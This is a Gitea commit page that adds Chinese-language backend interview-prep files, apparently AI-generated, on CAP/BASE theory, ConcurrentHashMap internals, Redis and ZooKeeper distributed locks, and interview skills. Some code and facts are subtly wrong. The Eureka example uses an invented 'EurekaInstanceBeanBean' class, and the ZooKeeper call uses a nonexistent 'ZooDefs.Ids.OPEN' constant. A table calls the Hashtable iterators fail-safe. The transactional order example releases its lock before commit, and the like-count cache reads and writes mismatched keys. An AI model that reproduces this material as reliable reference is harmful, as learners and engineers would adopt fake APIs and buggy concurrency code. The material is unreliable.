giteaadmin/interview
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

feat: add 50 backend interview questions and answers

Browse Source 
Generated comprehensive interview preparation materials covering:
- Distributed systems (transactions, locks, ID generation, consistency)
- Database (indexing, sharding, replication, transactions)
- Caching (Redis, cache problems, distributed lock)
- Message queues (RocketMQ, Kafka)
- Concurrency (ThreadLocal, ConcurrentHashMap, thread pools)
- JVM (GC, memory, tuning)
- System design (seckill, short URL, IM, feed, LBS)
- Algorithms (B+ tree, LRU, Red-Black tree, Skip list, Timing wheel)
- Network (TCP/IP, HTTP/HTTPS)
- Security (encryption, SQL injection, XSS)
- Performance tuning
- Design patterns
- Microservices (Spring Boot, Gateway, Service Mesh)
- Container orchestration (Kubernetes, Docker)
- CI/CD, observability

Each file includes:
- Detailed questions
- Comprehensive answers
- Code examples
- Real project experience
- Alibaba P7 level requirements

Generated with [Claude Code](https://claude.com/claude-code)
via [Happy](https://happy.engineering)

Co-Authored-By: Claude <noreply@anthropic.com>
Co-Authored-By: Happy <yesreply@happy.engineering>
This commit is contained in:
yasinshaw
2026-03-01 00:09:50 +08:00
parent d80d1cf553
commit fe2e6dc2f2
26 changed files with 10016 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

439
questions/cap-theorem.md Normal file
View File

@@ -0,0 +1,439 @@
# CAP 理论和 BASE 理论
## 问题
1. 什么是 CAP 理论CAP 三者为什么不可兼得?
2. 什么是 BASE 理论?
3. CP、AP、AP 架构分别适用于什么场景?
4. Zookeeper、Eureka、Nacos、Consul 分别是 CP 还是 AP
5. 在实际项目中如何权衡一致性、可用性、分区容错性?
---
## 标准答案
### 1. CAP 理论
#### **定义**
CAP 是指分布式系统中的三个核心指标:
| 指标 | 说明 | 示例 |
|------|------|------|
| **Consistency一致性** | 所有节点在同一时间看到相同的数据 | 写入后,所有节点立即读取到新数据 |
| **Availability可用性** | 系统持续提供服务,每个请求都能得到响应 | 即使部分节点故障,系统仍能响应 |
| **Partition Tolerance分区容错性** | 系统在网络分区时仍能继续运行 | 节点间网络断开,系统仍能工作 |
---
#### **CAP 定理**
**一个分布式系统最多只能同时满足两项**
```
┌─────────────────────────────────────┐
│ CAP 三选二 │
│ │
│ CA ────┐ │
│ │ │
│ ╲ │
│ ╲ │
│ ╲ │
│ ●────────●──────● │
│ C P A │
│ │
│ CP AP CA │
└─────────────────────────────────────┘
```
**为什么?**(证明)
```
场景:两个节点 N1、N2网络分区P
情况 1保证 C一致性
├─ N1 写入数据
└─ 为了保证一致性N2 必须拒绝读取(牺牲 A
情况 2保证 A可用性
├─ N1 写入数据
└─ 为了保证可用性N2 返回旧数据(牺牲 C
结论在有分区P的情况下C 和 A 无法同时满足
```
---
#### **CP、AP、CA 架构**
**1. CP一致性 + 分区容错)**
**特点**
- 保证数据一致性
- 分区时部分节点不可用
**适用场景**
- 金融系统(转账、支付)
- 库存系统(超卖不可接受)
**代表系统**
- ZookeeperCP
- HBaseCP
- Redis ClusterCP主从切换时短暂不可用
**示例**
```java
// Zookeeper 写入流程
client.setData("/node", data);
// 等待大多数节点确认
// 如果网络分区,部分节点无法写入
```
---
**2. AP可用性 + 分区容错)**
**特点**
- 保证系统可用
- 分区时可能读到脏数据
**适用场景**
- 社交媒体(点赞、评论)
- 内容分发CDN
- 用户行为统计
**代表系统**
- CassandraAP
- DynamoDBAP
- EurekaAP
- DNSAP
**示例**
```java
// Cassandra 写入
session.execute("INSERT INTO users (id, name) VALUES (1, 'Alice')");
// 写入成功立即返回
// 数据可能尚未复制到其他节点(最终一致性)
```
---
**3. CA一致性 + 可用性)**
**注意****在分布式系统中CA 不存在**(因为网络分区不可避免)。
**CA 存在于**
- 单机系统RDBMS
- 传统关系型数据库MySQL、PostgreSQL
---
### 2. BASE 理论
#### **定义**
BASE 是对 CAP 中 AP 方案的补充,通过**牺牲强一致性**来获得**高可用性**。
| 指标 | 说明 | 示例 |
|------|------|------|
| **Basically Available基本可用** | 系统出现故障时,允许损失部分可用性 | 秒杀时拒绝部分请求 |
| **Soft state软状态** | 允许数据存在中间状态 | 订单状态:待支付 → 已支付 |
| **Eventually consistent最终一致性** | 数据最终会达到一致状态 | 支付后 1 秒内到账 |
---
#### **BASE vs ACID**
| 特性 | ACID传统数据库 | BASENoSQL |
|------|-------------------|---------------|
| **一致性** | 强一致性(立即) | 最终一致性(延迟) |
| **可用性** | 可能(锁、事务) | 高(无锁、异步) |
| **隔离性** | 严格(锁) | 松散 |
| **持久性** | 强 | 弱(可能丢失) |
---
#### **最终一致性的实现**
**1. 读时修复Read Repair**
```java
// 读取时检查一致性
public User getUser(Long userId) {
// 从多个节点读取
User user1 = node1.get(userId);
User user2 = node2.get(userId);
// 发现不一致,修复
if (!user1.equals(user2)) {
// 使用版本号或时间戳决定哪个更新
User latest = user1.getVersion() > user2.getVersion() ? user1 : user2;
// 异步修复旧数据
asyncRepair(latest);
return latest;
}
return user1;
}
```
---
**2. 写时修复Write Repair**
```java
// 写入时同步到所有节点
public void saveUser(User user) {
// 写入主节点
masterNode.save(user);
// 异步同步到从节点
for (Node slave : slaves) {
CompletableFuture.runAsync(() -> {
slave.save(user);
});
}
}
```
---
**3. 异步复制**
```
主节点收到写入
立即返回成功
异步复制到从节点
最终一致
```
---
### 3. 主流注册中心对比
#### **ZookeeperCP**
**特点**
- 保证一致性ZAB 协议)
- Leader 挂了会重新选举(期间不可用)
**适用场景**
- 需要强一致性
- 对可用性要求不高(如配置中心)
**示例**
```java
// Zookeeper 注册
zk.create("/services/order/192.168.1.10:8080", data, ZooDefs.Ids.OPEN, NodeMode.EPHEMERAL);
```
---
#### **EurekaAP**
**特点**
- 保证可用性
- 客户端缓存注册信息
- 网络分区时仍能提供服务
**适用场景**
- 对可用性要求高
- 可容忍短暂的服务发现不准确
**示例**
```java
// Eureka 注册
@Bean
public EurekaInstanceBeanBean eurekaInstanceBean(InetAddress inetAddress) {
EurekaInstanceBeanBean bean = new EurekaInstanceBeanBean();
bean.setHostname(inetAddress.getHostAddress());
bean.setAppName("order-service");
bean.setNonSecurePort(8080);
return bean;
}
```
---
#### **NacosAP + CP**
**特点**
- 支持 AP 和 CP 切换
- 默认 AP临时实例
- 可配置 CP持久化实例
**配置**
```yaml
# Nacos 配置
spring:
cloud:
nacos:
discovery:
server-addr: localhost:8848
ephemeral: true # true=AP, false=CP
```
---
#### **ConsulCP**
**特点**
- 保证一致性Raft 协议)
- 支持 KV 存储
- 支持健康检查
**适用场景**
- 服务发现
- 配置中心
- 分布式锁
---
### 4. 实际项目应用
#### **场景 1订单系统CP**
**需求**
- 不能超卖
- 库存数据必须准确
**方案**
```
1. 使用分布式锁Redis、Zookeeper
2. 数据库使用强一致性事务
3. 库存扣减使用串行化
```
**代码**
```java
@Transactional
public void createOrder(Order order) {
// 1. 获取分布式锁
RLock lock = redissonClient.getLock("product:" + order.getProductId());
lock.lock();
try {
// 2. 查询库存
Product product = productMapper.selectById(order.getProductId());
if (product.getStock() < order.getQuantity()) {
throw new BusinessException("库存不足");
}
// 3. 扣减库存
product.setStock(product.getStock() - order.getQuantity());
productMapper.updateById(product);
// 4. 创建订单
orderMapper.insert(order);
} finally {
lock.unlock();
}
}
```
---
#### **场景 2社交点赞AP**
**需求**
- 高并发点赞
- 允许点赞数短暂不准确
**方案**
```
1. 先更新缓存Redis
2. 异步同步到数据库
3. 最终一致1 秒内)
```
**代码**
```java
public void like(Long userId, Long postId) {
// 1. 更新缓存(立即返回)
redisTemplate.opsForSet().add("post:" + postId + ":likes", userId);
// 2. 异步更新数据库
CompletableFuture.runAsync(() -> {
likeMapper.insert(new Like(userId, postId));
});
}
public Long getLikeCount(Long postId) {
// 1. 先查缓存
Long count = redisTemplate.opsForSet().size("post:" + postId + ":likes");
// 2. 如果缓存不存在,查数据库
if (count == null || count == 0) {
count = likeMapper.countByPostId(postId);
redisTemplate.opsForValue().set("post:" + postId + ":count", count, 1, TimeUnit.HOURS);
}
return count;
}
```
---
#### **场景 3库存同步最终一致性**
**需求**
- 多个仓库库存同步
- 允许短暂不一致
**方案**
```
1. 使用消息队列RocketMQ
2. 事务消息保证不丢失
3. 消费者重试保证最终一致
```
**代码**
```java
// 1. 发送事务消息
@Transactional
public void updateStock(Long productId, int quantity) {
// 更新数据库
productMapper.updateStock(productId, quantity);
// 发送事务消息
Message msg = new Message("StockTopic", "StockUpdate",
JSON.toJSONString(new StockUpdateEvent(productId, quantity)).getBytes());
rocketMQTemplate.sendMessageInTransaction(msg, null);
}
// 2. 消费消息
@RocketMQMessageListener(topic = "StockTopic", consumerGroup = "stock-consumer")
public class StockConsumer implements RocketMQListener<StockUpdateEvent> {
@Override
public void onMessage(StockUpdateEvent event) {
// 同步到其他仓库
warehouseService.syncStock(event.getProductId(), event.getQuantity());
}
}
```
---
### 5. 阿里 P7 加分项
**深度理解**
- 理解 CAP 理论的局限性(如网络延迟、时钟问题)
- 理解各种一致性协议Paxos、Raft、ZAB
- 理解分布式事务的权衡
**实战经验**
- 有设计 CP 或 AP 系统的经验
- 有处理数据不一致问题的经验
- 有最终一致性调优的经验
**架构能力**
- 能根据业务特点选择合适的架构
- 能设计混合架构(部分 CP、部分 AP
- 能设计数据修复和补偿机制
**技术选型**
- 了解各种注册中心和存储系统的 CAP 特性
- 能根据业务特点选择合适的技术
- 有分布式系统设计经验

476
questions/concurrentHashMap.md Normal file
View File

@@ -0,0 +1,476 @@
# ConcurrentHashMap 原理
## 问题
1. ConcurrentHashMap 在 JDK 1.7 和 1.8 中的实现有什么区别?
2. ConcurrentHashMap 如何保证线程安全?
3. ConcurrentHashMap 的 size() 方法是如何实现的?
4. ConcurrentHashMap 和 Hashtable、Collections.synchronizedMap 的区别?
5. 在实际项目中如何选择线程安全的 Map
---
## 标准答案
### 1. JDK 1.7 vs 1.8
#### **JDK 1.7:分段锁**
**结构**
```
ConcurrentHashMap
Segment[](分段数组,默认 16 个)
HashEntry[](每个 Segment 有自己的 HashEntry 数组)
HashEntry键值对
```
**特点**
- **分段锁**:每个 Segment 独立加锁ReentrantLock
- **并发度**:默认 16Segment 数量)
- **粒度**Segment 级别
**获取锁流程**
```java
// 1. 计算 Segment 索引
int hash = hash(key.hashCode());
int segmentIndex = (hash >>> segmentShift) & segmentMask;
// 2. 获取 Segment
Segment segment = segments[segmentIndex];
// 3. 加锁
segment.lock();
try {
// 操作 HashEntry[]
} finally {
segment.unlock();
}
```
---
#### **JDK 1.8CAS + synchronized**
**结构**
```
ConcurrentHashMap
Node[] + TreeNode[](数组 + 链表 + 红黑树)
Node / TreeNode
```
**特点**
- **CAS + synchronized**CAS 失败后使用 synchronized
- **粒度**Node 级别(更细)
- **并发度**:理论上无限制(实际受限于数组大小)
**核心改进**
| 特性 | JDK 1.7 | JDK 1.8 |
|------|---------|---------|
| **锁机制** | ReentrantLock分段 | CAS + synchronizedNode 级别) |
| **锁粒度** | Segment 级别 | Node 级别(更细) |
| **并发度** | 默认 16 | 理论无限制 |
| **查询** | 需要加锁(不强一致) | 无锁volatile |
| **红黑树** | 不支持 | 支持(链表长度 ≥ 8 |
---
### 2. JDK 1.8 实现原理
#### **核心数据结构**
```java
public class ConcurrentHashMap<K, V> {
// 数组
transient volatile Node<K,V>[] table;
// 数组(扩容时使用)
private transient volatile Node<K,V>[] nextTable;
// 基础计数器值
private transient volatile long baseCount;
// 控制位sizeCtl < 0初始化或扩容-1正在初始化<-1扩容线程数
private transient volatile int sizeCtl;
}
```
---
#### **Node 节点**
```java
static class Node<K,V> implements Map.Entry<K,V> {
final int hash;
final K key;
volatile V val;
volatile Node<K,V> next; // 链表下一个节点
}
```
**注意**`val``next` 都是 `volatile`,保证可见性。
---
#### **TreeNode红黑树节点**
```java
static final class TreeNode<K,V> extends Node<K,V> {
TreeNode<K,V> parent; // 父节点
TreeNode<K,V> left; // 左子节点
TreeNode<K,V> right; // 右子节点
TreeNode<K,V> prev; // 前驱节点
boolean red; // 颜色(红黑树)
}
```
**转换条件**
- 链表 → 红黑树:链表长度 ≥ 8 **且** 数组长度 ≥ 64
- 红黑树 → 链表:红黑树节点数 ≤ 6
---
### 3. 核心 API 源码解析
#### **put() 方法**
```java
public V put(K key, V value) {
return putVal(key, value, false);
}
final V putVal(K key, V value, boolean onlyIfAbsent) {
if (key == null || value == null) throw new NullPointerException();
// 1. 计算哈希值(扰动函数,减少哈希冲突)
int hash = spread(key.hashCode());
int binCount = 0;
// 2. 无限循环CAS + 重试)
for (Node<K,V>[] tab = table;;) {
Node<K,V> f; int n, i, fh;
// 2.1 初始化数组(延迟初始化)
if (tab == null || (n = tab.length) == 0)
tab = initTable();
// 2.2 计算索引位置
else if ((f = tabAt(tab, i = (n - 1) & hash)) == null) {
// 位置为空CAS 插入
if (casTabAt(tab, i, null, new Node<K,V>(hash, key, value, null)))
break; // CAS 成功,退出
}
// 2.3 扩容中MOVED = -1
else if ((fh = f.hash) == MOVED)
tab = helpTransfer(tab, f); // 帮助扩容
// 2.4 位置不为空(链表或红黑树)
else {
V oldVal = null;
synchronized (f) { // 加锁Node 级别)
if (tabAt(tab, i) == f) {
// 链表
if (fh >= 0) {
binCount = 1;
for (Node<K,V> e = f;; ++binCount) {
K ek;
// 键已存在,更新值
if (e.hash == hash &&
((ek = e.key) == key ||
(ek != null && key.equals(ek)))) {
oldVal = e.val;
if (!onlyIfAbsent)
e.val = value;
break;
}
Node<K,V> pred = e;
// 到达链表尾部,插入新节点
if ((e = e.next) == null) {
pred.next = new Node<K,V>(hash, key,
value, null);
break;
}
}
}
// 红黑树
else if (f instanceof TreeBin) {
Node<K,V> p;
binCount = 2;
if ((p = ((TreeBin<K,V>)f).putTreeVal(hash, key,
value)) != null) {
oldVal = p.val;
if (!onlyIfAbsent)
p.val = value;
}
}
}
}
// 2.5 链表转红黑树
if (binCount != 0) {
if (binCount >= TREEIFY_THRESHOLD)
treeifyBin(tab, i); // TREEIFY_THRESHOLD = 8
if (oldVal != null)
return oldVal;
break;
}
}
}
// 3. 增加元素个数LongAdder
addCount(1L, binCount);
return null;
}
```
---
#### **get() 方法**
```java
public V get(Object key) {
Node<K,V>[] tab; Node<K,V> e, p; int n, eh; K ek;
int h = spread(key.hashCode());
// 1. 数组不为空且索引位置不为空
if ((tab = table) != null && (n = tab.length) > 0 &&
(e = tabAt(tab, (n - 1) & h)) != null) {
// 2. 第一个节点匹配
if ((eh = e.hash) == h) {
if ((ek = e.key) == key || (ek != null && key.equals(ek)))
return e.val;
}
// 3. 红黑树
else if (eh < 0)
return (p = e.find(h, key)) != null ? p.val : null;
// 4. 链表遍历
while ((e = e.next) != null) {
if (e.hash == h &&
((ek = e.key) == key || (ek != null && key.equals(ek))))
return e.val;
}
}
return null;
}
```
**注意**
- **无锁读取**:整个 `get()` 方法无锁
- **volatile 可见性**`Node.val``volatile`,保证读到最新值
---
#### **size() 方法**
**问题**:如何高效统计元素个数?
**方案****LongAdder**(分段计数)
```java
public int size() {
long n = sumCount();
return ((n < 0L) ? 0 :
(n > (long)Integer.MAX_VALUE) ? Integer.MAX_VALUE :
(int)n);
}
final long sumCount() {
// 计算所有 CounterCell 的和
CounterCell[] as = counterCells;
long sum = baseCount;
if (as != null) {
for (CounterCell a : as)
if (a != null)
sum += a.value;
}
return sum;
}
```
**LongAdder 原理**
```
LongAdder
baseCount基础值
CounterCell[](计数器数组,避免 CAS 竞争)
多线程更新时,随机选择一个 CounterCell 更新
统计时baseCount + 所有 CounterCell 的值
```
**为什么高效?**
- 高并发时,多线程更新不同的 CounterCell无竞争
- 统计时才累加(牺牲实时性换取性能)
---
### 4. ConcurrentHashMap vs 其他 Map
#### **对比表**
| 特性 | HashMap | Hashtable | Collections.synchronizedMap | ConcurrentHashMap |
|------|---------|-----------|----------------------------|-------------------|
| **线程安全** | ❌ 否 | ✅ 是 | ✅ 是 | ✅ 是 |
| **锁机制** | 无 | synchronized | synchronized | CAS + synchronized |
| **锁粒度** | - | 整个表 | 整个表 | Node 级别 |
| **并发度** | 无 | 低 | 低 | 高 |
| **迭代器** | Fail-Fast | Fail-Safe | Fail-Safe | Fail-Safe |
| **null 键值** | 允许 | 不允许 | 不允许 | 不允许 |
---
#### **详细对比**
**1. Hashtable不推荐**
```java
// Hashtable 的 put 方法(整个表加锁)
public synchronized V put(K key, V value) {
// ...
}
```
**问题**
- **锁粒度太大**:整个表加锁
- **并发度低**:同一时刻只有一个线程能操作
---
**2. Collections.synchronizedMap()**
```java
Map<String, String> map = Collections.synchronizedMap(new HashMap<>());
```
**原理**
```java
// 内部使用 mutexObject加锁
public V put(K key, V value) {
synchronized (mutex) { // 整个 Map 加锁
return m.put(key, value);
}
}
```
**问题**
- **锁粒度太大**:整个 Map 加锁
- **迭代器需要手动加锁**
```java
Map<String, String> map = Collections.synchronizedMap(new HashMap<>());
// 遍历需要手动加锁
synchronized (map) {
for (Map.Entry<String, String> entry : map.entrySet()) {
// ...
}
}
```
---
**3. ConcurrentHashMap推荐**
```java
Map<String, String> map = new ConcurrentHashMap<>();
```
**优点**
- **锁粒度小**Node 级别
- **并发度高**:理论上无限制
- **迭代器无需加锁**Fail-Safe弱一致迭代器
---
### 5. 实际项目应用
#### **场景 1本地缓存**
```java
@Component
public class LocalCache {
private final ConcurrentHashMap<String, Object> cache = new ConcurrentHashMap<>();
public void put(String key, Object value) {
cache.put(key, value);
}
public Object get(String key) {
return cache.get(key);
}
public void remove(String key) {
cache.remove(key);
}
}
```
---
#### **场景 2计数器**
```java
@Component
public class CounterService {
private final ConcurrentHashMap<String, LongAdder> counters = new ConcurrentHashMap<>();
public void increment(String key) {
counters.computeIfAbsent(key, k -> new LongAdder()).increment();
}
public long get(String key) {
LongAdder adder = counters.get(key);
return adder != null ? adder.sum() : 0;
}
}
```
---
#### **场景 3去重表**
```java
@Component
public class DeduplicationService {
private final ConcurrentHashMap<String, Boolean> dedupTable = new ConcurrentHashMap<>();
public boolean isDuplicate(String id) {
return dedupTable.putIfAbsent(id, true) != null;
}
}
```
---
### 6. 阿里 P7 加分项
**深度理解**
- 理解 `ConcurrentHashMap` 的扩容机制(多线程协同扩容)
- 理解 `LongAdder` 的实现原理Cell 数组 + CAS
- 理解 `ConcurrentHashMap` 的弱一致迭代器
**实战经验**
- 有使用 `ConcurrentHashMap` 解决并发问题的经验
-`ConcurrentHashMap` 性能调优的经验
- 有处理 `ConcurrentHashMap` 相关线上问题的经验
**架构能力**
- 能根据业务特点选择合适的 Map 实现
- 能设计高性能的并发数据结构
- 有分布式缓存的设计经验
**技术选型**
- 了解 `ConcurrentSkipListMap`(跳表实现)
- 了解 Guava 的 `LocalCache`Caffeine
- 能根据场景选择本地缓存或分布式缓存

1047
questions/design-patterns.md Normal file
View File

File diff suppressed because it is too large Load Diff

456
questions/distributed-lock.md Normal file
View File

@@ -0,0 +1,456 @@
# 分布式锁
## 问题
1. 什么是分布式锁?为什么需要分布式锁?
2. 如何用 Redis 实现分布式锁?
3. Redis 分布式锁有哪些坑?如何解决?
4. Zookeeper 如何实现分布式锁?
5. Redis 分布式锁和 Zookeeper 分布式锁的区别?
6. Redisson 是如何实现分布式锁的?
7. 在实际项目中如何使用分布式锁?
---
## 标准答案
### 1. 为什么需要分布式锁
#### **场景**
**单机锁synchronized、ReentrantLock**
```java
@Service
public class OrderService {
private synchronized void createOrder(Order order) {
// 单机环境下有效
// 分布式环境下无效(不同 JVM
}
}
```
**问题**
- 单机锁只对单个 JVM 有效
- 分布式环境下,多个实例的锁互不排斥
- 需要跨 JVM、跨机器的锁机制
---
### 2. Redis 分布式锁
#### **基本实现**
```java
public class RedisDistributedLock {
private final StringRedisTemplate redisTemplate;
// 加锁
public boolean lock(String key, String value, long expireTime) {
// SET key value NX PX expireTime
Boolean success = redisTemplate.opsForValue()
.setIfAbsent(key, value, expireTime, TimeUnit.MILLISECONDS);
return success != null && success;
}
// 释放锁
public boolean unlock(String key, String value) {
// Lua 脚本:保证原子性
String luaScript =
"if redis.call('get', KEYS[1]) == ARGV[1] then " +
" return redis.call('del', KEYS[1]) " +
"else " +
" return 0 " +
"end";
DefaultRedisScript<Long> script = new DefaultRedisScript<>(luaScript, Long.class);
Long result = redisTemplate.execute(script, Collections.singletonList(key), value);
return result != null && result == 1;
}
}
```
---
#### **使用示例**
```java
@Service
public class OrderService {
@Autowired
private RedisDistributedLock lock;
public void createOrder(Order order) {
String lockKey = "order:" + order.getProductId();
String lockValue = UUID.randomUUID().toString();
try {
// 加锁(过期时间 30 秒)
boolean locked = lock.lock(lockKey, lockValue, 30000);
if (!locked) {
throw new BusinessException("系统繁忙,请稍后再试");
}
// 执行业务逻辑
// 1. 查询库存
// 2. 扣减库存
// 3. 创建订单
} finally {
// 释放锁
lock.unlock(lockKey, lockValue);
}
}
}
```
---
### 3. Redis 分布式锁的坑
#### **坑 1锁超时问题**
**场景**
```
线程 A 获取锁(设置 30 秒过期)
线程 A 执行业务(耗时 50 秒)
30 秒后,锁自动过期
线程 B 获取锁
线程 A 执行完毕,释放锁(把线程 B 的锁释放了!)
```
**解决方案看门狗Watchdog**
**原理**
- 启动后台线程
- 定期检查锁是否还存在
- 如果存在,续期(延长过期时间)
**Redisson 实现**
```java
RLock lock = redisson.getLock("myLock");
lock.lock(); // 自动续期(默认 30 秒)
try {
// 业务逻辑
} finally {
lock.unlock();
}
```
---
#### **坑 2主从切换导致锁丢失**
**场景**
```
线程 A 在 Master 获取锁
锁未同步到 Slave
Master 宕机Slave 升级为 Master
线程 B 在新 Master 上获取锁(冲突!)
```
**解决方案RedlockRedis 分布式锁算法)**
**原理**
- 向多个独立的 Redis 节点请求加锁
- 大多数节点加锁成功才算成功
```java
// Redisson Redlock
RLock lock1 = redisson1.getLock("myLock");
RLock lock2 = redisson2.getLock("myLock");
RLock lock3 = redisson3.getLock("myLock");
RedissonRedLock redLock = new RedissonRedLock(lock1, lock2, lock3);
try {
redLock.lock();
// 业务逻辑
} finally {
redLock.unlock();
}
```
---
#### **坑 3释放锁时误删**
**场景**
```
线程 A 获取锁
线程 A 执行时间过长,锁超时过期
线程 B 获取锁
线程 A 执行完毕,释放锁(删除了线程 B 的锁!)
```
**解决方案Lua 脚本 + 唯一标识**
```lua
-- Lua 脚本(原子操作)
if redis.call('get', KEYS[1]) == ARGV[1] then
return redis.call('del', KEYS[1])
else
return 0
end
```
**Java 实现**
```java
public boolean unlock(String key, String value) {
String luaScript =
"if redis.call('get', KEYS[1]) == ARGV[1] then " +
" return redis.call('del', KEYS[1]) " +
"else " +
" return 0 " +
"end";
DefaultRedisScript<Long> script = new DefaultRedisScript<>(luaScript, Long.class);
Long result = redisTemplate.execute(script, Collections.singletonList(key), value);
return result != null && result == 1;
}
```
---
### 4. Zookeeper 分布式锁
#### **原理**
利用 Zookeeper 的**临时顺序节点**
```
/lock
/lock/node-0000000001 (客户端 1)
/lock/node-0000000002 (客户端 2)
/lock/node-0000000003 (客户端 3)
```
**流程**
1. 客户端创建临时顺序节点
2. 获取所有子节点,判断自己是否是序号最小的
3. 如果是最小节点,获取锁
4. 如果不是,监听前一个节点的删除事件
---
#### **Curator 实现**
```java
@Component
public class ZkDistributedLock {
private final InterProcessMutex lock;
public ZkDistributedLock(CuratorFramework curatorFramework) {
this.lock = new InterProcessMutex(curatorFramework, "/lock");
}
public void acquire() {
try {
lock.acquire();
} catch (Exception e) {
throw new RuntimeException("获取锁失败", e);
}
}
public void release() {
try {
lock.release();
} catch (Exception e) {
throw new RuntimeException("释放锁失败", e);
}
}
}
```
**使用**
```java
@Service
public class OrderService {
@Autowired
private ZkDistributedLock lock;
public void createOrder(Order order) {
try {
lock.acquire();
// 业务逻辑
} finally {
lock.release();
}
}
}
```
---
### 5. Redis vs Zookeeper
| 特性 | Redis | Zookeeper |
|------|-------|-----------|
| **性能** | 高(内存操作) | 低(磁盘 + ZAB 协议) |
| **可靠性** | 中(可能丢锁) | 高CP 一致性) |
| **实现复杂度** | 简单 | 复杂 |
| **获取锁方式** | 轮询 | Watcher 通知(事件驱动) |
| **锁释放** | 超时自动释放 | 会话结束自动释放 |
| **适用场景** | 高并发、对一致性要求不高 | 严格一致性要求 |
---
### 6. Redisson 原理
#### **看门狗(自动续期)**
```java
RLock lock = redisson.getLock("myLock");
lock.lock(); // 默认 leaseTime = -1启用看门狗
```
**原理**
```
1. 加锁成功,启动看门狗线程
2. 看门狗每 10 秒检查一次
3. 如果锁还存在,续期 30 秒
4. 客户端宕机,会话结束,看门狗停止,锁自动过期
```
---
#### **公平锁**
```java
RLock fairLock = redisson.getFairLock("myLock");
fairLock.lock();
```
**原理**
- 加锁时,添加到队列尾部
- 按照请求顺序获取锁
- 性能比非公平锁低
---
#### **读写锁**
```java
RReadWriteLock rwLock = redisson.getReadWriteLock("myLock");
rwLock.readLock().lock(); // 读锁(共享)
rwLock.writeLock().lock(); // 写锁(独占)
```
---
### 7. 实际项目应用
#### **场景 1秒杀系统**
```java
@Service
public class SeckillService {
@Autowired
private RedissonClient redisson;
public void seckill(Long userId, Long productId) {
RLock lock = redisson.getLock("seckill:" + productId);
try {
// 尝试加锁(最多等待 3 秒,锁自动释放时间 10 秒)
boolean locked = lock.tryLock(3, 10, TimeUnit.SECONDS);
if (!locked) {
throw new BusinessException("抢购人数过多,请稍后再试");
}
// 1. 查询库存
Integer stock = redisTemplate.opsForValue().get("stock:" + productId);
if (stock == null || stock <= 0) {
throw new BusinessException("库存不足");
}
// 2. 扣减库存
redisTemplate.opsForValue().decrement("stock:" + productId);
// 3. 创建订单
createOrder(userId, productId);
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
throw new BusinessException("系统异常");
} finally {
if (lock.isHeldByCurrentThread()) {
lock.unlock();
}
}
}
}
```
---
#### **场景 2定时任务分布式锁**
```java
@Component
public class ScheduledTask {
@Autowired
private RedissonClient redisson;
@Scheduled(cron = "0 */5 * * * ?") // 每 5 分钟
public void execute() {
RLock lock = redisson.getLock("scheduled-task");
try {
// 只有一个实例执行
boolean locked = lock.tryLock(0, 5, TimeUnit.MINUTES);
if (!locked) {
return; // 其他实例正在执行
}
// 执行任务
doTask();
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
} finally {
if (lock.isHeldByCurrentThread()) {
lock.unlock();
}
}
}
}
```
---
### 8. 阿里 P7 加分项
**深度理解**
- 理解 CAP 理论在分布式锁中的体现
- 理解 Redis 的 ZSet 实现延迟队列的原理
- 理解 ZAB 协议和 ZK 的一致性保证
**实战经验**
- 有处理分布式锁死锁的经验
- 有分布式锁性能优化的经验
- 有分布式锁监控的经验
**架构能力**
- 能设计高可用的分布式锁方案
- 能设计分布式锁的容灾方案
- 能设计分布式锁的降级方案
**技术选型**
- 了解 Redis、Zookeeper、Etcd 等多种分布式锁实现
- 能根据业务特点选择合适的方案
- 有自研分布式锁的经验

0
questions/docker.md Normal file
View File

0
questions/dubbo.md Normal file
View File

0
questions/elastic-search.md Normal file
View File

148
questions/interview-skills.md Normal file
View File

@@ -0,0 +1,148 @@
# 面试技巧和职业规划
## 问题
1. 如何准备技术面试?
2. 面试中如何回答项目经验?
3. 如何进行技术深度学习?
4. P7 级别的要求是什么?
5. 如何准备系统设计题?
---
## 标准答案
### 1. 面试准备清单
**基础复习1-2 周)**
- [ ] Java 基础集合、并发、JVM
- [ ] 数据库(索引、事务、锁)
- [ ] Redis数据结构、持久化、集群
- [ ] 消息队列Kafka、RocketMQ
- [ ] 分布式事务、缓存、限流
**算法刷题2-4 周)**
- [ ] LeetCode Hot 100
- [ ] 剑指 Offer
- [ ] 关注:数组、链表、树、动态规划
**系统设计(持续)**
- [ ] 设计短链接系统
- [ ] 设计秒杀系统
- [ ] 设计微博 Feed 流
- [ ] 设计分布式 ID 生成器
---
### 2. 项目经验回答STAR 法则)
**STAR**
- **S**ituation情境项目背景
- **T**ask任务你的职责
- **A**ction行动你做了什么
- **R**esult结果取得了什么成果
**示例**
```
S情境
某电商双11大促订单峰值 QPS 达到 10 万,原有系统无法支撑。
T任务
我负责订单系统的性能优化,目标是将响应时间从 2s 降至 200ms。
A行动
1. 分析瓶颈发现数据库查询是主要瓶颈80% 时间)
2. 优化 SQL添加索引将慢查询从 100ms 降至 5ms
3. 引入缓存:使用 Redis 缓存热点数据,命中率 95%
4. 异步处理:非核心逻辑(发邮件、发短信)异步化
5. 压测验证:使用 JMeter 压测,逐步优化参数
R结果
- 响应时间从 2s 降至 150ms目标 200ms
- 成功支撑双11峰值 QPS 10 万
- 系统稳定性 99.99%
```
---
### 3. 技术深度学习
**如何深入?**
```
1. 看源码Spring、MyBatis、Redis
2. 读文档官方文档、RFC
3. 写博客(输出倒逼输入)
4. 做分享(团队内、技术社区)
5. 参与开源GitHub、PR
```
**推荐资源**
- 书籍:《深入理解 Java 虚拟机》、《MySQL 技术内幕》
- 博客:美团技术博客、阿里技术公众号
- 视频TED、Google I/O
- 论文SIGMOD、VLDB数据库
---
### 4. P7 级别要求
**硬技能**
- 精通一门语言Java、Go、Python
- 深入理解某一领域(数据库、消息队列、分布式)
- 有系统设计能力
- 有性能优化经验
**软技能**
- 技术影响力(博客、分享、开源)
- 团队协作Code Review、技术方案评审
- 问题解决能力(线上故障排查)
- 技术规划能力(技术选型、架构演进)
---
### 5. 系统设计题答题思路
**5 步法**
```
1. 需求澄清
- 功能需求(做什么)
- 非功能需求QPS、数据量、一致性
- 约束条件(预算、时间、人力)
2. 容量估算
- QPS每秒请求数
- 存储容量(数据量、增长速度)
- 带宽需求
3. 核心设计
- 架构图(画出关键组件)
- 数据模型ER 图、表设计)
- 核心流程(时序图)
4. 瓶颈分析
- 可能的瓶颈(单点、数据库、缓存)
- 解决方案(集群、分片、缓存)
5. 扩展性
- 如何扩容(水平扩展、垂直扩展)
